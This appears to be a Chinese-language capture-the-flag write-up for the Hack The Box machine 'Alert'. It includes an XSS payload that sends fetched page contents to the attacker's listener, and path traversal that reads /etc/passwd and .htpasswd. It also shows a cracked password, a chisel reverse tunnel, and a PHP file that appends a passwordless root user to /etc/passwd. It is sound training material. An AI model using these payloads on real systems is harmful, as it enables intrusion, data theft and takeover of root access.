当前位置: 首页 > article >正文

HTB:Alert[WriteUP]

article 2025/2/3 7:13:30

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用ffuf对alert.htb域名进行子域名FUZZ

使用gobuster对alert.htb域名进行路径FUZZ

边界突破

使用curl访问/messages.php文件

使用浏览器直接访问alert.htb域名

再次构造一个XSS脚本,访问/messages.php文件并将响应结果传输回攻击机

本地侧netcat监听后成功收到回显

读取Apache的配置文件,其默认路径为:/etc/apache2/sites-available/000-default.conf

使用john通过字典爆破该密码哈希

使用ssh通过上述凭证登录靶机

权限提升

查看靶机内部网络连接

攻击机使用chisel开始监听反向连接

通过代理chisel的1080端口,访问该服务

进入该WebAPP目录下,查看文件权限分配情况

直接通过php代码使其执行系统命令追加一个root用户

在攻击机中使用浏览器或curl访问该文件

连接至HTB服务器并启动靶机

分配IP:10.10.16.22

靶机IP:10.10.11.44

靶机Domain:alert.htb

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a alert.htb -r 1-65535 --ulimit 5000 | tee res

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p22,80 -sCV -Pn alert.htb

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p22,80 --script=vuln -O -Pn alert.htb

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn alert.htb

使用ffuf对alert.htb域名进行子域名FUZZ

ffuf -u http://alert.htb -H 'Host: FUZZ.alert.htb' -w ../dictionary/subdomains-top20000.txt -t 50 -fw 20

使用gobuster对alert.htb域名进行路径FUZZ

gobuster dir -u http://alert.htb -w ../dictionary/Common-dir.txt -x php,txt -t 50

边界突破

使用curl访问/messages.php文件

curl -v http://alert.htb/messages.php

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://alert.htb/messages.php
* Host alert.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.44
*   Trying 10.10.11.44:80...
* Connected to alert.htb (10.10.11.44) port 80
* using HTTP/1.x
> GET /messages.php HTTP/1.1
> Host: alert.htb
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Sun, 02 Feb 2025 13:47:13 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 1
< Content-Type: text/html; charset=UTF-8
<

* Connection #0 to host alert.htb left intact

  • 由回显可见,虽然响应码为200但并未返回任何实质内容,应该存在访问白名单

使用浏览器直接访问alert.htb域名

  • 可见,该页允许上传一个.md文件,因此我尝试XSS反弹
<script>
alert(1)
</script>
  • 上传至靶机后,由弹窗可知该JS代码被成功解析

再次构造一个XSS脚本,访问/messages.php文件并将响应结果传输回攻击机

<script>
fetch("http://alert.htb/messages.php")
.then(response => response.text())
.then(data => {fetch("http://10.10.16.22:1425/?file_content=" + encodeURIComponent(data));});
</script>
  • 上传至靶机后,点击右下角的Share Markdown获得该文件URL

  • 回到主界面,找到上方的Contact Us

  • 将URL发送至靶机支持团队

本地侧netcat监听后成功收到回显
nc -lvnp 1425

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425                             
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 42838
GET /?file_content=%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

  • 使用python将内容解码
python -c "import urllib.parse; print(urllib.parse.unquote_plus('%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A'))"

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python -c "import urllib.parse; print(urllib.parse.unquote_plus('%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A'))"
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

  • 此处我注意到地址:messages.php?file=2024-03-10_15-48-34.txt,由此可见messages.php允许接收一个file参数,因此我尝试通过它进行本地文件读取
<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../../../etc/passwd")
.then(response => response.text())
.then(data => {fetch("http://10.10.16.22:1425/?file_content=" + encodeURIComponent(data));});
</script>
  • 如法炮制上面的步骤,成功收到响应

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425                                                                                
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 52334
GET /?file_content=%3Cpre%3Eroot%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash%0Adaemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fusr%2Fsbin%2Fnologin%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Asys%3Ax%3A3%3A3%3Asys%3A%2Fdev%3A%2Fusr%2Fsbin%2Fnologin%0Async%3Ax%3A4%3A65534%3Async%3A%2Fbin%3A%2Fbin%2Fsync%0Agames%3Ax%3A5%3A60%3Agames%3A%2Fusr%2Fgames%3A%2Fusr%2Fsbin%2Fnologin%0Aman%3Ax%3A6%3A12%3Aman%3A%2Fvar%2Fcache%2Fman%3A%2Fusr%2Fsbin%2Fnologin%0Alp%3Ax%3A7%3A7%3Alp%3A%2Fvar%2Fspool%2Flpd%3A%2Fusr%2Fsbin%2Fnologin%0Amail%3Ax%3A8%3A8%3Amail%3A%2Fvar%2Fmail%3A%2Fusr%2Fsbin%2Fnologin%0Anews%3Ax%3A9%3A9%3Anews%3A%2Fvar%2Fspool%2Fnews%3A%2Fusr%2Fsbin%2Fnologin%0Auucp%3Ax%3A10%3A10%3Auucp%3A%2Fvar%2Fspool%2Fuucp%3A%2Fusr%2Fsbin%2Fnologin%0Aproxy%3Ax%3A13%3A13%3Aproxy%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Awww-data%3Ax%3A33%3A33%3Awww-data%3A%2Fvar%2Fwww%3A%2Fusr%2Fsbin%2Fnologin%0Abackup%3Ax%3A34%3A34%3Abackup%3A%2Fvar%2Fbackups%3A%2Fusr%2Fsbin%2Fnologin%0Alist%3Ax%3A38%3A38%3AMailing%20List%20Manager%3A%2Fvar%2Flist%3A%2Fusr%2Fsbin%2Fnologin%0Airc%3Ax%3A39%3A39%3Aircd%3A%2Fvar%2Frun%2Fircd%3A%2Fusr%2Fsbin%2Fnologin%0Agnats%3Ax%3A41%3A41%3AGnats%20Bug-Reporting%20System%20(admin)%3A%2Fvar%2Flib%2Fgnats%3A%2Fusr%2Fsbin%2Fnologin%0Anobody%3Ax%3A65534%3A65534%3Anobody%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-network%3Ax%3A100%3A102%3Asystemd%20Network%20Management%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-resolve%3Ax%3A101%3A103%3Asystemd%20Resolver%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-timesync%3Ax%3A102%3A104%3Asystemd%20Time%20Synchronization%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Amessagebus%3Ax%3A103%3A106%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asyslog%3Ax%3A104%3A110%3A%3A%2Fhome%2Fsyslog%3A%2Fusr%2Fsbin%2Fnologin%0A_apt%3Ax%3A105%3A65534%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Atss%3Ax%3A106%3A111%3ATPM%20software%20stack%2C%2C%2C%3A%2Fvar%2Flib%2Ftpm%3A%2Fbin%2Ffalse%0Auuidd%3Ax%3A107%3A112%3A%3A%2Frun%2Fuuidd%3A%2Fusr%2Fsbin%2Fnologin%0Atcpdump%3Ax%3A108%3A113%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Alandscape%3Ax%3A109%3A115%3A%3A%2Fvar%2Flib%2Flandscape%3A%2Fusr%2Fsbin%2Fnologin%0Apollinate%3Ax%3A110%3A1%3A%3A%2Fvar%2Fcache%2Fpollinate%3A%2Fbin%2Ffalse%0Afwupd-refresh%3Ax%3A111%3A116%3Afwupd-refresh%20user%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Ausbmux%3Ax%3A112%3A46%3Ausbmux%20daemon%2C%2C%2C%3A%2Fvar%2Flib%2Fusbmux%3A%2Fusr%2Fsbin%2Fnologin%0Asshd%3Ax%3A113%3A65534%3A%3A%2Frun%2Fsshd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-coredump%3Ax%3A999%3A999%3Asystemd%20Core%20Dumper%3A%2F%3A%2Fusr%2Fsbin%2Fnologin%0Aalbert%3Ax%3A1000%3A1000%3Aalbert%3A%2Fhome%2Falbert%3A%2Fbin%2Fbash%0Alxd%3Ax%3A998%3A100%3A%3A%2Fvar%2Fsnap%2Flxd%2Fcommon%2Flxd%3A%2Fbin%2Ffalse%0Adavid%3Ax%3A1001%3A1002%3A%2C%2C%2C%3A%2Fhome%2Fdavid%3A%2Fbin%2Fbash%0A%3C%2Fpre%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

  • 使用python对其解码
python -c "import urllib.parse; print(urllib.parse.unquote_plus('%3Cpre%3Eroot%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash%0Adaemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fusr%2Fsbin%2Fnologin%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Asys%3Ax%3A3%3A3%3Asys%3A%2Fdev%3A%2Fusr%2Fsbin%2Fnologin%0Async%3Ax%3A4%3A65534%3Async%3A%2Fbin%3A%2Fbin%2Fsync%0Agames%3Ax%3A5%3A60%3Agames%3A%2Fusr%2Fgames%3A%2Fusr%2Fsbin%2Fnologin%0Aman%3Ax%3A6%3A12%3Aman%3A%2Fvar%2Fcache%2Fman%3A%2Fusr%2Fsbin%2Fnologin%0Alp%3Ax%3A7%3A7%3Alp%3A%2Fvar%2Fspool%2Flpd%3A%2Fusr%2Fsbin%2Fnologin%0Amail%3Ax%3A8%3A8%3Amail%3A%2Fvar%2Fmail%3A%2Fusr%2Fsbin%2Fnologin%0Anews%3Ax%3A9%3A9%3Anews%3A%2Fvar%2Fspool%2Fnews%3A%2Fusr%2Fsbin%2Fnologin%0Auucp%3Ax%3A10%3A10%3Auucp%3A%2Fvar%2Fspool%2Fuucp%3A%2Fusr%2Fsbin%2Fnologin%0Aproxy%3Ax%3A13%3A13%3Aproxy%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Awww-data%3Ax%3A33%3A33%3Awww-data%3A%2Fvar%2Fwww%3A%2Fusr%2Fsbin%2Fnologin%0Abackup%3Ax%3A34%3A34%3Abackup%3A%2Fvar%2Fbackups%3A%2Fusr%2Fsbin%2Fnologin%0Alist%3Ax%3A38%3A38%3AMailing%20List%20Manager%3A%2Fvar%2Flist%3A%2Fusr%2Fsbin%2Fnologin%0Airc%3Ax%3A39%3A39%3Aircd%3A%2Fvar%2Frun%2Fircd%3A%2Fusr%2Fsbin%2Fnologin%0Agnats%3Ax%3A41%3A41%3AGnats%20Bug-Reporting%20System%20(admin)%3A%2Fvar%2Flib%2Fgnats%3A%2Fusr%2Fsbin%2Fnologin%0Anobody%3Ax%3A65534%3A65534%3Anobody%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-network%3Ax%3A100%3A102%3Asystemd%20Network%20Management%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-resolve%3Ax%3A101%3A103%3Asystemd%20Resolver%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-timesync%3Ax%3A102%3A104%3Asystemd%20Time%20Synchronization%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Amessagebus%3Ax%3A103%3A106%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asyslog%3Ax%3A104%3A110%3A%3A%2Fhome%2Fsyslog%3A%2Fusr%2Fsbin%2Fnologin%0A_apt%3Ax%3A105%3A65534%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Atss%3Ax%3A106%3A111%3ATPM%20software%20stack%2C%2C%2C%3A%2Fvar%2Flib%2Ftpm%3A%2Fbin%2Ffalse%0Auuidd%3Ax%3A107%3A112%3A%3A%2Frun%2Fuuidd%3A%2Fusr%2Fsbin%2Fnologin%0Atcpdump%3Ax%3A108%3A113%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Alandscape%3Ax%3A109%3A115%3A%3A%2Fvar%2Flib%2Flandscape%3A%2Fusr%2Fsbin%2Fnologin%0Apollinate%3Ax%3A110%3A1%3A%3A%2Fvar%2Fcache%2Fpollinate%3A%2Fbin%2Ffalse%0Afwupd-refresh%3Ax%3A111%3A116%3Afwupd-refresh%20user%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Ausbmux%3Ax%3A112%3A46%3Ausbmux%20daemon%2C%2C%2C%3A%2Fvar%2Flib%2Fusbmux%3A%2Fusr%2Fsbin%2Fnologin%0Asshd%3Ax%3A113%3A65534%3A%3A%2Frun%2Fsshd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-coredump%3Ax%3A999%3A999%3Asystemd%20Core%20Dumper%3A%2F%3A%2Fusr%2Fsbin%2Fnologin%0Aalbert%3Ax%3A1000%3A1000%3Aalbert%3A%2Fhome%2Falbert%3A%2Fbin%2Fbash%0Alxd%3Ax%3A998%3A100%3A%3A%2Fvar%2Fsnap%2Flxd%2Fcommon%2Flxd%3A%2Fbin%2Ffalse%0Adavid%3Ax%3A1001%3A1002%3A%2C%2C%2C%3A%2Fhome%2Fdavid%3A%2Fbin%2Fbash%0A%3C%2Fpre%3E%0A'))"

<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
</pre>

读取Apache的配置文件,其默认路径为:/etc/apache2/sites-available/000-default.conf

  • 获得响应

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 41872
GET /?file_content=%3Cpre%3E%3CVirtualHost%20*%3A80%3E%0A%20%20%20%20ServerName%20alert.htb%0A%0A%20%20%20%20DocumentRoot%20%2Fvar%2Fwww%2Falert.htb%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Falert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20RewriteEngine%20On%0A%20%20%20%20RewriteCond%20%25%7BHTTP_HOST%7D%20!%5Ealert%5C.htb%24%0A%20%20%20%20RewriteCond%20%25%7BHTTP_HOST%7D%20!%5E%24%0A%20%20%20%20RewriteRule%20%5E%2F%3F(.*)%24%20http%3A%2F%2Falert.htb%2F%241%20%5BR%3D301%2CL%5D%0A%0A%20%20%20%20ErrorLog%20%24%7BAPACHE_LOG_DIR%7D%2Ferror.log%0A%20%20%20%20CustomLog%20%24%7BAPACHE_LOG_DIR%7D%2Faccess.log%20combined%0A%3C%2FVirtualHost%3E%0A%0A%3CVirtualHost%20*%3A80%3E%0A%20%20%20%20ServerName%20statistics.alert.htb%0A%0A%20%20%20%20DocumentRoot%20%2Fvar%2Fwww%2Fstatistics.alert.htb%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Fstatistics.alert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Fstatistics.alert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20Indexes%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%20%20%20%20AuthType%20Basic%0A%20%20%20%20%20%20%20%20AuthName%20%22Restricted%20Area%22%0A%20%20%20%20%20%20%20%20AuthUserFile%20%2Fvar%2Fwww%2Fstatistics.alert.htb%2F.htpasswd%0A%20%20%20%20%20%20%20%20Require%20valid-user%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20ErrorLog%20%24%7BAPACHE_LOG_DIR%7D%2Ferror.log%0A%20%20%20%20CustomLog%20%24%7BAPACHE_LOG_DIR%7D%2Faccess.log%20combined%0A%3C%2FVirtualHost%3E%0A%0A%3C%2Fpre%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

  • 使用CyberChef进行解码,可见.htpasswd文件路径:/var/www/statistics.alert.htb/.htpasswd

  • 读取.htpasswd文件

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 34862
GET /?file_content=%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

  • 再次使用CyberChef解码,获得一份凭证

账户:albert

密码哈希:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

  • 将该密码哈希存入文件中
echo '$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/' > hash
使用john通过字典爆破该密码哈希
john hash --wordlist=../dictionary/rockyou.txt --format=md5crypt-long

  • 获得完整凭证

账户:albert

密码:manchesterunited

使用ssh通过上述凭证登录靶机

ssh albert@alert.htb

  • /home/albert目录下找到user.txt文件

albert@alert:~$ ls
user.txt
albert@alert:~$ pwd
/home/albert
albert@alert:~$ cat user.txt
c7756c23c61c6bfe638b9ef0f5dd21a2

权限提升

查看靶机内部网络连接

ss -tlnp

  • 可见,8080端口仅允许本地访问,使用chisel将其映射至攻击机

攻击机使用chisel开始监听反向连接

chisel server -p 8888 --reverse
  • 控制靶机连接至攻击机chisel服务器
./chisel64 client 10.10.16.22:8888 R:socks
  • 攻击机chisel服务端收到连接回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# chisel server -p 8888 --reverse     
2025/02/02 14:08:39 server: Reverse tunnelling enabled
2025/02/02 14:08:39 server: Fingerprint 25IPnk94XCx+F+CwNdUr/eR2Fh8awqZSx87sFGotha4=
2025/02/02 14:08:39 server: Listening on http://0.0.0.0:8888
2025/02/02 14:09:22 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2025/02/02 14:09:22 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

通过代理chisel的1080端口,访问该服务
  • 可见该WebAPP为:Website Monitor

  • 查看靶机进程也可应验
ps -aux | grep 8080
  • 由输出可知,该进程由root用户启动

albert@alert:/tmp$ ps -aux | grep 8080
root        1001  0.0  0.6 207256 26552 ?        Ss   09:59   0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
albert      5254  0.0  0.0   6432   724 pts/0    S+   14:56   0:00 grep --color=auto 8080

进入该WebAPP目录下,查看文件权限分配情况
cd /opt/website-monitor

  • 由输出可见,monitors目录允许其他用户写入

直接通过php代码使其执行系统命令追加一个root用户

  • 首先进入该目录中
cd monitors
  • 在/etc/passwd文件中追加root用户
echo '<?php exec("echo x0da6h::0:0:x0da6h:/root:/bin/bash >> /etc/passwd"); ?>' > x0da6h.php
在攻击机中使用浏览器或curl访问该文件

  • 回到靶机中查看/etc/passwd文件可见该用户被成功追加

  • 直接切换到该用户
su x0da6h

albert@alert:~$ su x0da6h
root@alert:/home/albert# id
uid=0(root) gid=0(root) groups=0(root)
root@alert:/home/albert# whoami
root

  • /root目录下找到root.txt文件

root@alert:~# pwd
/root
root@alert:~# ls
root.txt  scripts
root@alert:~# cat root.txt
f8e13577a1c0404ce343be234410e3d1


http://www.kler.cn/a/529439.html

相关文章:

  • 如何构建ObjC语言编译环境?构建无比简洁的clang编译ObjC环境?Windows搭建Swift语言编译环境?
  • 人工智能学习(四)之机器学习基本概念
  • python学习——函数的返回值
  • 牛客网 除2!(详解)c++
  • 5.4.2 结构化设计方法+结构化程序设计方法
  • conda配置channel
  • 实现C语言的原子操作
  • 【机器学习】自定义数据集,使用scikit-learn 中K均值包 进行聚类
  • 第12章:基于TransUnet和SwinUnet网络实现的医学图像语义分割:腹部13器官分割(网页推理)
  • 成绩案例demo
  • 【FreeRTOS 教程 七】互斥锁与递归互斥锁
  • Java 中的 function 接口像一件艺术品
  • BUUCTF_[羊城杯2020]easyphp(构造特殊文件名,字符串拼接绕过/正则表达式/代码审计)
  • 【自开发工具介绍】SQLSERVER的ImpDp和ExpDp工具02
  • Swoole如何实现多进程
  • kamailio-ASYNC模块详解【以下内容来源于官网,该文章仅作为翻译】
  • Python淘宝电脑销售数据爬虫可视化分析大屏全屏系统 开题报告
  • 电信传输基本理论/5G网络层次架构——超三万字详解:适用期末考试/考研/工作
  • Redis背景介绍
  • Node.js 和 npm 安装教程
  • 99.24 金融难点通俗解释:MLF(中期借贷便利)vs LPR(贷款市场报价利率)
  • 软件工程概论试题四
  • 【Shell编程 / 8】脚本优化与高级功能:提高效率与自动化管理
  • 在 Windows 上安装 DeepSeek 的完整指南
  • 为什么要用tauri开发跨平台桌面
  • 首发!ZStack 智塔支持 DeepSeek V3/R1/ Janus Pro,多种国产 CPU/GPU 可私有化部署